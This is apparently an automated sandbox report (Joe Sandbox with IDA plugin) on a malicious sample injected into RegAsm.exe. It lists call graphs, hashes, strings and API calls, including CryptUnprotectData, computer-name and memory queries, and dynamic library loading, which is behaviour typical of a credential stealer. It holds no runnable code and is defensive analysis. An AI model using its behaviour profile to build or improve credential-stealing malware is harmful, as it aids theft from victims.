4216ac 10749->10751 10752 4217a5 10750->10752 10754 42163e 10750->10754 10753 4392d0 RtlAllocateHeap 10752->10753 10753->10751 10755 4392d0 RtlAllocateHeap 10754->10755 10755->10751 10756 41711c 10757 41715e 10756->10757 10758 4155e0 2 API calls 10757->10758 10759 4171a2 10758->10759 10760 4155e0 2 API calls 10759->10760 10761 417250 10760->10761 10762 4155e0 2 API calls 10761->10762 10763 417324 10762->10763 10764 4155e0 2 API calls 10763->10764 10765 4173c9 10764->10765 10766 4392d0 RtlAllocateHeap 10765->10766 10767 41792f 10766->10767 10767->10767 10772 437830 10767->10772 10770 4155e0 2 API calls 10771 4179c1 10770->10771 10773 43e3d0 2 API calls 10772->10773 10774 437852 10773->10774 10775 4179af 10774->10775 10776 437b10 10774->10776 10777 437b6e 10774->10777 10780 4392d0 RtlAllocateHeap 10774->10780 10783 437954 10774->10783 10788 43792e 10774->10788 10775->10770 10803 4397b0 10776->10803 10784 4397b0 LdrInitializeThunk 10777->10784 10781 437872 10780->10781 10781->10788 10790 43b550 LdrInitializeThunk 10781->10790 10783->10775 10789 43b550 LdrInitializeThunk 10783->10789 10785 437bb9 10784->10785 10785->10785 10788->10776 10788->10777 10788->10783 10791 439910 10788->10791 10795 439a20 10788->10795 10789->10775 10790->10788 10792 4399ee 10791->10792 10793 439926 10791->10793 10792->10788 10793->10792 10807 43b550 LdrInitializeThunk 10793->10807 10796 439c5e 10795->10796 10797 439a3b 10795->10797 10796->10788 10797->10796 10797->10797 10801 439b0e 10797->10801 10808 43b550 LdrInitializeThunk 10797->10808 10798 439c2e 10798->10796 10799 439910 LdrInitializeThunk 10798->10799 10799->10796 10801->10798 10809 43b550 LdrInitializeThunk 10801->10809 10804 4398ce 10803->10804 10805 4397c7 10803->10805 10804->10777 10805->10804 10805->10805 10810 43b550 LdrInitializeThunk 10805->10810 10807->10792 10808->10801 10809->10798 10810->10804 10811 41ed20 10812 41ed33 10811->10812 10812->10812 10813 43ed00 LdrInitializeThunk 10812->10813 10814 41eeb5 10813->10814 10815 4218a0 10819 421904 10815->10819 10816 42196e 10817 421a72 10816->10817 10818 4392d0 RtlAllocateHeap 10816->10818 10821 4219a8 10818->10821 10819->10816 10830 43b550 LdrInitializeThunk 10819->10830 10822 421a6e 10821->10822 10831 43b550 LdrInitializeThunk 10821->10831 10822->10817 10824 4392d0 RtlAllocateHeap 10822->10824 10825 421ad6 10824->10825 10825->10817 10826 421c80 10825->10826 10828 421b40 10825->10828 10827 4392d0 RtlAllocateHeap 10826->10827 10827->10817 10829 4392d0 RtlAllocateHeap 10828->10829 10829->10817 10830->10816 10831->10822 10832 43bf27 10834 43be41 10832->10834 10833 43beee 10834->10833 10836 43b550 LdrInitializeThunk 10834->10836 10836->10833 10837 421da4 10838 421e1f 10837->10838 10842 439470 10838->10842 10840 439470 LdrInitializeThunk 10841 421e74 10840->10841 10841->10840 10841->10841 10844 4394d6 10842->10844 10843 4396de 10843->10841 10845 43954e 10844->10845 10848 43b550 LdrInitializeThunk 10844->10848 10845->10843 10845->10845 10849 43b550 LdrInitializeThunk 10845->10849 10848->10845 10849->10843 10850 43b424 10851 43b450 10850->10851 10851->10851 10852 43b487 RtlReAllocateHeap 10851->10852 10853 43b534 10852->10853 10854 41efa9 10855 41efc3 10854->10855 10856 4392d0 RtlAllocateHeap 10855->10856 10857 41efce 10856->10857 10860 43ee70 10857->10860 10859 41efef 10862 43eecd 10860->10862 10861 43ef3e 10863 4392d0 RtlAllocateHeap 10861->10863 10867 43f04e 10861->10867 10862->10861 10868 43b550 LdrInitializeThunk 10862->10868 10865 43ef81 10863->10865 10865->10867 10869 43b550 LdrInitializeThunk 10865->10869 10867->10859 10867->10867 10868->10861 10869->10867 10870 431caa 10871 431caf 10870->10871 10872 431d49 KiUserCallbackDispatcher GetSystemMetrics 10871->10872 10873 431d96 DeleteObject 10872->10873 10875 431df5 SelectObject 10873->10875 10877 431ebd SelectObject 10875->10877 10878 431ee9 DeleteObject 10877->10878 10882 432620 10878->10882 10883 432674 10882->10883 10884 4392d0 RtlAllocateHeap 10883->10884 10885 432756 10884->10885 10886 42112e 10887 43f190 2 API calls 10886->10887 10891 42114d 10887->10891 10888 421464 10889 421214 10888->10889 10898 43b550 LdrInitializeThunk 10888->10898 10890 43ed00 LdrInitializeThunk 10890->10891 10891->10888 10891->10889 10891->10890 10891->10891 10892 43f8a0 2 API calls 10891->10892 10893 4392d0 RtlAllocateHeap 10891->10893 10894 43ee70 2 API calls 10891->10894 10897 43b550 LdrInitializeThunk 10891->10897 10892->10891 10893->10891 10894->10891 10897->10891 10898->10888 10899 43b22d 10901 43ad26 10899->10901 10900 43b328 10901->10899 10901->10900 10902 43ae1d LoadLibraryW 10901->10902 10902->10901 10903 43ad10 10902->10903 10904 43ac2d 10905 43acda LoadLibraryW 10904->10905 10906 43ac95 10904->10906 10906->10905 10906->10906 10910 41e630 10911 41e70e 10910->10911 10912 41b800 2 API calls 10911->10912 10913 41e76a 10912->10913 10914 41b800 2 API calls 10913->10914 10914->10913 10920 43ba37 10921 43ba74 10920->10921 10923 43baee 10921->10923 10926 43b550 LdrInitializeThunk 10921->10926 10925 43b550 LdrInitializeThunk 10923->10925 10925->10923 10926->10923 10927 41b6b5 10928 41b6ba 10927->10928 10929 41b67f 10927->10929 10932 41b800 2 API calls 10928->10932 10930 41b690 10929->10930 10931 41b800 2 API calls 10929->10931 10931->10930 10933 41b707 10932->10933 10934 4199bb 10935 43e8d0 LdrInitializeThunk 10934->10935 10936 4199d9 10935->10936
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: $b$20B$B5B$onqp$r0B$rv$0B
            • API String ID: 0-1944758922
            • Opcode ID: edff4b5e4e7c3aacf56abd3bbf51f38e1dfd669a515e0e6a589fdcf7a5fdc6b8
            • Instruction ID: 30c9691241a217a0d159b54bd45473d0addb90d6340fcc8710ec2b6a19cb58ed
            • Opcode Fuzzy Hash: edff4b5e4e7c3aacf56abd3bbf51f38e1dfd669a515e0e6a589fdcf7a5fdc6b8
            • Instruction Fuzzy Hash: 8E82ABB5600B00CFD724CF29D890B57B7E2FB89308F15896DD8AA8B791D778E906CB54
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
            • String ID:
            • API String ID: 1449868515-3916222277
            • Opcode ID: ce5221298d70a6d8bd71840225cdc3b079bb6b101e0ff014e643683a19389f87
            • Instruction ID: c1d4038cd4e9c09bb1cfdb71d03c6fd685851939a8da0fd308a8b4374489cc65
            • Opcode Fuzzy Hash: ce5221298d70a6d8bd71840225cdc3b079bb6b101e0ff014e643683a19389f87
            • Instruction Fuzzy Hash: ACA16CB8614B008FC364DF2CD981A16BBF1FB89704F10896DE99AC7760D771B844CB92
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 873 4279f5-427a49 874 427a83-427a90 873->874 875 427a4b 873->875 876 427a92-427a93 874->876 877 427aab-42845a 874->877 878 427a50-427a81 875->878 879 427aa0-427aa9 876->879 881 428491-428496 877->881 882 42845c-42845f 877->882 878->874 878->878 879->877 879->879 884 428498-4284a1 881->884 885 4284bd-4284bf 881->885 883 428460-42848f 882->883 883->881 883->883 886 4284b0-4284b9 884->886 887 4284c5-4284cb call 4372e0 885->887 886->886 888 4284bb 886->888 890 4284d0-4284de 887->890 888->887 891 4284e0-4284e3 890->891 892 4284fd 890->892 894 4284f0-4284f9 891->894 893 4284ff-428522 call 43d8f0 892->893 897 428527-428540 GetPhysicallyInstalledSystemMemory 893->897 894->894 895 4284fb 894->895 895->893 898 428542-428548 897->898 899 42858e-428597 897->899 900 42854a 898->900 901 428599-42859e 898->901 902 4285d0-428616 899->902 903 428550-42857a 900->903 904 4285a0-4285c5 901->904 905 428581-42858c 901->905 906 428618 902->906 907 42864f-428698 902->907 903->903 908 42857c-42857f 903->908 909 4285c8-4285ca 904->909 905->909 910 428620-42864d 906->910 911 42869a 907->911 912 4286df-4286e4 907->912 908->904 908->905 909->902 910->907 910->910 915 4286a0-4286dd 911->915 913 4286e6-4286e9 912->913 914 4286fd 912->914 916 4286f0-4286f9 913->916 917 4286ff-428707 914->917 915->912 915->915 916->916 918 4286fb 916->918 919 42871b-428723 917->919 920 428709-42870a 917->920 918->917 922 428725-428726 919->922 923 42873b-4287ab 919->923 921 428710-428719 920->921 921->919 921->921 924 428730-428739 922->924 925 4287f3-4287f8 923->925 926 4287ad-4287af 923->926 924->923 924->924 928 4287fa-428803 925->928 929 42881d-42881f 925->929 927 4287b0-4287f1 926->927 927->925 927->927 931 428810-428819 928->931 930 428825-42882d 929->930 933 42883b-428863 930->933 934 42882f 930->934 931->931 932 42881b 931->932 932->930 937 428870 933->937 935 428830-428839 934->935 935->933 935->935 937->937
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 2RPJ
            • API String ID: 0-955047986
            • Opcode ID: 6fe48aa669fb8cb35e40a0ece54005537d032e4d8a616d3258cad11b5ac2a25a
            • Instruction ID: 9d4cb991920f31e2a3602d43936c0be1b5d8e99185aeebb713fd4007471301d2
            • Opcode Fuzzy Hash: 6fe48aa669fb8cb35e40a0ece54005537d032e4d8a616d3258cad11b5ac2a25a
            • Instruction Fuzzy Hash: 6DE1C1702057518BD729CF28D060726FBF1BF9A304F68869DC4DA8B792D739E846CB94
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 804f35b266dbb574133b141487b1538aa80bbd43e783cd2564efea3336da4334
            • Instruction ID: bb7fd6e985126494af5336d1c3bc17315decfa5e51e2b0400c998cc611c3e7a9
            • Opcode Fuzzy Hash: 804f35b266dbb574133b141487b1538aa80bbd43e783cd2564efea3336da4334
            • Instruction Fuzzy Hash: 4A32AF702087928FE725CF28D490762FBF1BF16304F58459ED4DA8B792D339A846CBA5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 004274A2
            • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042759F
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ComputerName
            • String ID:
            • API String ID: 3545744682-0
            • Opcode ID: 6466feb4505024e0828d3ca0b95d0f9fe761e44a00bca8f7b4301ed6184b3e14
            • Instruction ID: f548616978202c524340049508e7f213d6bda89abe4b01e1c1339fbbd1821ec8
            • Opcode Fuzzy Hash: 6466feb4505024e0828d3ca0b95d0f9fe761e44a00bca8f7b4301ed6184b3e14
            • Instruction Fuzzy Hash: 00329F702087528FE725CF28D490B62FBF1BF5A304F18469DD4DA8B792D339A846CB95
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LdrInitializeThunk.NTDLL(0043E58C,005C003F,00000006,00120089,?,00000018,7452,00000000,004156BE), ref: 0043B576
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InitializeThunk
            • String ID: 7452
            • API String ID: 2994545307-87867774
            • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
            • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
            • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
            • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042852B
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InstalledMemoryPhysicallySystem
            • String ID:
            • API String ID: 3960555810-0
            • Opcode ID: 5d9e9b438f00a267178fd5037ff845645c216cdafcefacf4d2f29aaea793b2de
            • Instruction ID: 07dadd28a917c87803f837ba8b534b0912da124911bfb1aa40d57cbc6f9ab5ae
            • Opcode Fuzzy Hash: 5d9e9b438f00a267178fd5037ff845645c216cdafcefacf4d2f29aaea793b2de
            • Instruction Fuzzy Hash: 69C1E5702057518BD725CF29D060726FBF1BF9A304F68869DC4DA8B786DB39E806CB58
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 004392D0: RtlAllocateHeap.NTDLL(?,00000000,00409DBE), ref: 00439367
            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041698E
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocateCryptDataHeapUnprotect
            • String ID:
            • API String ID: 1063247315-0
            • Opcode ID: 66c1b707c6aa9a0411d3f0a12a0c21e55d2c955556611dfe43f30d8406654139
            • Instruction ID: 039af2fc9cb4c169f6bc8fe2a1c153d9d07f268f4bbbd2e8ed916e7c84c7fe5c
            • Opcode Fuzzy Hash: 66c1b707c6aa9a0411d3f0a12a0c21e55d2c955556611dfe43f30d8406654139
            • Instruction Fuzzy Hash: FE41D6B5508341CFD724CF28C491B9BB7E1AFD5304F18896EE4A987352D638D84ACB56
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c72369126cff0e2aa555d42f53c57bb13bd3e792f4119b6a06ca1884301cebf0
            • Instruction ID: 534c9b2ec845aa1e86e2864cf96deafb1b91f085cce45749ec54a1ec3c8a0150
            • Opcode Fuzzy Hash: c72369126cff0e2aa555d42f53c57bb13bd3e792f4119b6a06ca1884301cebf0
            • Instruction Fuzzy Hash: BAF039B8104701CFD320DF28C484B1BBBE4FB49344F40881DE99A8B354CBB4AA40CF42
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 271 41e0c0-41e13c 272 41e176-41e1b9 RtlExpandEnvironmentStrings 271->272 273 41e13e-41e13f 271->273 275 41e1c2 272->275 276 41e1bb-41e1c0 272->276 274 41e140-41e174 273->274 274->272 274->274 277 41e1c5-41e256 call 4392d0 RtlExpandEnvironmentStrings 275->277 276->277 280 41e2b2-41e2df 277->280 281 41e258 277->281 283 41e2e1-41e2e6 280->283 284 41e2e8-41e2ea 280->284 282 41e260-41e2b0 281->282 282->280 282->282 285 41e2ed-41e302 call 4392d0 283->285 284->285 288 41e321-41e331 285->288 289 41e304-41e309 285->289 291 41e351-41e35f call 43e5b0 288->291 292 41e333-41e33a 288->292 290 41e310-41e31f 289->290 290->288 290->290 295 41e364-41e381 291->295 293 41e340-41e34f 292->293 293->291 293->293
            APIs
            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041E1AD
            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041E1D8
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: EnvironmentExpandStrings
            • String ID: iWk$1mo$3]!_$=Y,[$je$~H
            • API String ID: 237503144-1999540153
            • Opcode ID: 2680b6665d4764b42100269f461c71080ad2627966abee742ef6fed1943d2de2
            • Instruction ID: 39b11f33bb14334007ed1353e805041977c84587be0fa6475d6e8676d698132c
            • Opcode Fuzzy Hash: 2680b6665d4764b42100269f461c71080ad2627966abee742ef6fed1943d2de2
            • Instruction Fuzzy Hash: 0161AA752083518FE324CF15C8A1BABB7E1EF8A708F044A1DE8E55B281D3B89945CB97
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 363 41ead0-41eb90 364 41eb92 363->364 365 41ebe9-41ec29 RtlExpandEnvironmentStrings 363->365 366 41eba0-41ebe7 364->366 367 41ec32 365->367 368 41ec2b-41ec30 365->368 366->365 366->366 369 41ec35-41eca1 call 4392d0 RtlExpandEnvironmentStrings 367->369 368->369 372 41eca3 369->372 373 41ece8-41ecf5 call 4185d0 369->373 374 41ecb0-41ece6 372->374 376 41ecfa-41ecfd 373->376 374->373 374->374
            APIs
            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041EC1D
            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 0041EC4C
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: EnvironmentExpandStrings
            • String ID: )qs$JW$TF$aZ$ru
            • API String ID: 237503144-2698335981
            • Opcode ID: be1774074dc17c2b4a0ba5d5494aeafe98b1835ca79f435291a2448782d5417c
            • Instruction ID: 03051454b74d4003968060d2d42400c185a6ba78efbccd90e9d01649d30d6933
            • Opcode Fuzzy Hash: be1774074dc17c2b4a0ba5d5494aeafe98b1835ca79f435291a2448782d5417c
            • Instruction Fuzzy Hash: 225162B5208342AFD314CF01C894B5BBBE1EBC6354F10892DF8A55B390E738D94ACB96
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 687 415bc0-415bd7 688 415be0-415be9 687->688 688->688 689 415beb-415c0c RtlExpandEnvironmentStrings 688->689 690 415c15 689->690 691 415c0e-415c13 689->691 692 415c18-415c9d call 4392d0 RtlExpandEnvironmentStrings 690->692 691->692 695 415cf3-415d23 692->695 696 415c9f 692->696 698 415d25-415d2a 695->698 699 415d2c-415d2e 695->699 697 415ca0-415cf1 696->697 697->695 697->697 700 415d31-415d48 call 4392d0 698->700 699->700 703 415d71-415d81 700->703 704 415d4a-415d53 700->704 706 415da1-415db5 call 43e3d0 703->706 707 415d83-415d8a 703->707 705 415d60-415d6f 704->705 705->703 705->705 710 415dba-415dd6 706->710 708 415d90-415d9f 707->708 708->706 708->708
            APIs
            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00415BFD
            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00415C2E
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: EnvironmentExpandStrings
            • String ID: 4U+W
            • API String ID: 237503144-3070584207
            • Opcode ID: 1df84995eb40340e8ec846035962dadfd76d3446cd8ca4a2419fa415fa3fe5c7
            • Instruction ID: ed523981dcb6c846914fc60588fa9cd78359472fb005d6a9ad21166a12392ff6
            • Opcode Fuzzy Hash: 1df84995eb40340e8ec846035962dadfd76d3446cd8ca4a2419fa415fa3fe5c7
            • Instruction Fuzzy Hash: 7451CE702083419BD724CF24D891BABB7B5FFC6354F04891DF99A8B381E778A845CB96
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 711 4091d0-4091e7 call 43a930 715 4091e9 711->715 716 4091eb-4091f2 call 435130 711->716 717 409230-40923c ExitProcess 715->717 720 4091f4 716->720 721 4091f6-40921e GetConsoleWindow call 409250 call 40a680 716->721 722 409229-40922e call 43b360 720->722 729 409220 721->729 730 409222 call 410530 721->730 722->717 731 409227 729->731 730->731 731->722
            APIs
            Strings
            • of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 004091FF
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ExitProcess
            • String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
            • API String ID: 621844428-2804141084
            • Opcode ID: d5cca5f178ed6c499484f9090daf3563c98c522081e7c93a8473633cb6b44859
            • Instruction ID: ef9a4640f3d76029ef3cd28d8c7b20320b2ac3189829f29e0b0174d0f585c7c8
            • Opcode Fuzzy Hash: d5cca5f178ed6c499484f9090daf3563c98c522081e7c93a8473633cb6b44859
            • Instruction Fuzzy Hash: A6F09674C18205B6D6103BB56B0A26E3B685F12344F010C7FFC8175183EA7D4D15966F
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: &I
            • API String ID: 1029625771-2530667579
            • Opcode ID: 03ab0146c6f110e73d86cca74854f14c52691ef98ac0ae3bb3a75499cc31dc52
            • Instruction ID: 8bf46805403616723667aa4a2cb618cf325339e40fb4dfab83fa5f0c07476e44
            • Opcode Fuzzy Hash: 03ab0146c6f110e73d86cca74854f14c52691ef98ac0ae3bb3a75499cc31dc52
            • Instruction Fuzzy Hash: C721D1B09193019FD708DF11EC5462EBBE2FBC9309F14982EE89607225E3349515CF8A
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: $I
            • API String ID: 1029625771-3960913755
            • Opcode ID: 9255aba700b7582338cbca9e68c71424d48ee2e632fc7f7279624a7bcfbdd635
            • Instruction ID: db8e7918e172825827c01dcd5c7fb17611e57cc1dd9633def376390a9af84618
            • Opcode Fuzzy Hash: 9255aba700b7582338cbca9e68c71424d48ee2e632fc7f7279624a7bcfbdd635
            • Instruction Fuzzy Hash: DCD05EBB1C25029FE744FB20AE51C273295FE8A280719953BC04382355EB38D423DBAF
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041860A
            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00418638
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: EnvironmentExpandStrings
            • String ID:
            • API String ID: 237503144-0
            • Opcode ID: d1d18a5d5fcd9550b48eb21a8f91ac5a0faa576a42820056fd331e98c56cc01f
            • Instruction ID: a7c267f0493bb453d4328cd908709cdeb89ae36806c0e8699da810c13a775427
            • Opcode Fuzzy Hash: d1d18a5d5fcd9550b48eb21a8f91ac5a0faa576a42820056fd331e98c56cc01f
            • Instruction Fuzzy Hash: EC01F536504604BBD610AB14CC86F77736CEB86728F588619F921C72C1EB74BD04C6FA
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f713e1d65be1f8a23acecc3c0a0811e1ae28d5339950774fa045137fb205103e
            • Instruction ID: d5eac2ad64f1d9c2aad69cb09eb59c610886e570a559aa125f10f7578d74e5d1
            • Opcode Fuzzy Hash: f713e1d65be1f8a23acecc3c0a0811e1ae28d5339950774fa045137fb205103e
            • Instruction Fuzzy Hash: A8418DB09193019FD718DF11E85472FBBE2FBCA349F14992EE8A617251E7348518CF8A
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: de9288b82a0e1c24465c050187a5e6e39458b072fe2c93c498e951e87166e5da
            • Instruction ID: c55b77e37f7197176c1b6e24f70985046c44e88e87a69efacbef3687f3900326
            • Opcode Fuzzy Hash: de9288b82a0e1c24465c050187a5e6e39458b072fe2c93c498e951e87166e5da
            • Instruction Fuzzy Hash: BA11E37424C3409BD708DF00D4A171BBBE2EFEA319F149A0DE4A907385D7399606CB8A
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0043B498
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 7a60c54a2a0bacfb95885a4fce793f89768e3577d0edbf07c615bb644a751b49
            • Instruction ID: 843d7fd62c14df83992cb405de463a7b86960fe077edc05ee09dda5aa80e0c24
            • Opcode Fuzzy Hash: 7a60c54a2a0bacfb95885a4fce793f89768e3577d0edbf07c615bb644a751b49
            • Instruction Fuzzy Hash: B8119475A097808FC7128F28D8D0780BFB1EF1A30970905AAD5E5C7663C324B85ECB64
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00439456
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: c5bae9c87fb37e14f9cfa556edb60907ea8c190926235be6b385dd13d9a48261
            • Instruction ID: 913027b61dc95214993bd2bef33208e1dcdceea67442d192d450229a2cf3c7d5
            • Opcode Fuzzy Hash: c5bae9c87fb37e14f9cfa556edb60907ea8c190926235be6b385dd13d9a48261
            • Instruction Fuzzy Hash: C71118706093019FD708CF04D4A476BBBA2FBD9329F248A5DE4A507681C779D906CB86
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlAllocateHeap.NTDLL(?,00000000,00409DBE), ref: 00439367
            Memory Dump Source
            • Source File: 00000001.00000002.1733205579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: c21ef27c82c1599a525ccddeeb4f3f6986c275307282e5c376303d393f987d55
            • Instruction ID: a2698bad51abde713349918e9bb4c1058c6d1bcc52dfc0b655d57e09c327a6f7
            • Opcode Fuzzy Hash: c21ef27c82c1599a525ccddeeb4f3f6986c275307282e5c376303d393f987d55
            • Instruction Fuzzy Hash: 5F1123705083019FD708CF14D860B6BBBA2FBC9329F248A1DE8A907691D7759A15CBC6
